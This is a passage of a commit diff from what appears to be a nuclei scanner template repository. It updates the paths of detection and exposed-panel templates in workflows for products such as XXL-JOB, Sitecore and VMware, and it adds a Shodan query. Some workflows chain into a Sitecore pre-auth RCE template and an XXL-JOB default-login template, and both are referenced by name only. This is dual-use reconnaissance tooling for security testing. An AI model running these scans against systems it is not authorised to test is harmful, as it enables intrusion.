path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200

3
technologies/yapi-detect.yaml
View File

@ -4,6 +4,8 @@ info:
name: YApi Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.title:"YApi"
tags: tech,yapi
requests:
@ -13,7 +15,6 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:

2
workflows/openam-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenAM related nuclei templates on a given target.
workflows:
- template: technologies/openam-detect.yaml
- template: exposed-panels/openam-panel.yaml
subtemplates:
- tags: openam

2
workflows/opensis-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all OpenSIS related nuclei templates on a given target.
workflows:
- template: technologies/opensis-detect.yaml
- template: exposed-panels/opensis-panel.yaml
subtemplates:
- tags: opensis

2
workflows/phpcollab-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all PhpCollab related nuclei templates on a given target.
workflows:
- template: technologies/phpcollab-detect.yaml
- template: exposed-panels/phpcollab-panel.yaml
subtemplates:
- tags: phpcollab

6
workflows/sitecore-workflow.yaml
View File

@ -6,8 +6,6 @@ info:
description: A simple workflow that runs all SiteCore related nuclei templates on a given target.
workflows:
- template: technologies/sitecore-default-page.yaml
- template: exposed-panels/sitecore-login.yaml
- template: technologies/default-sitecore-page.yaml
subtemplates:
- tags: vulnerabilities/sitecore-pre-auth-rce.yaml
- template: misconfiguration/sitecore-debug-page.yaml
- tags: sitecore

2
workflows/thinkcmf-workflow.yaml
View File

@ -5,6 +5,6 @@ info:
description: A simple workflow that runs all ThinkCMF related nuclei templates on a given target.
workflows:
- template: technologies/thinkcmf-detection.yaml
- template: technologies/thinkcmf-detect.yaml
subtemplates:
- tags: thinkcmf

2
workflows/vmware-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VMware Pipeline related nuclei templates on a given target.
workflows:
- template: technologies/vmware-detect.yaml
- template: technologies/vmware/vmware-detect.yaml
subtemplates:
- tags: vmware

2
workflows/voipmonitor-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target.
workflows:
- template: technologies/voipmonitor-detect.yaml
- template: exposed-panels/voipmonitor-panel.yaml
subtemplates:
- tags: voipmonitor

2
workflows/xxljob-workflow.yaml
View File

@ -6,6 +6,6 @@ info:
description: A simple workflow that runs all XXL-JOB related nuclei templates on a given target.
workflows:
- template: technologies/xxljob-admin-detect.yaml
- template: exposed-panels/xxljob-panel.yaml
subtemplates:
- template: default-logins/xxljob/xxljob-default-login.yaml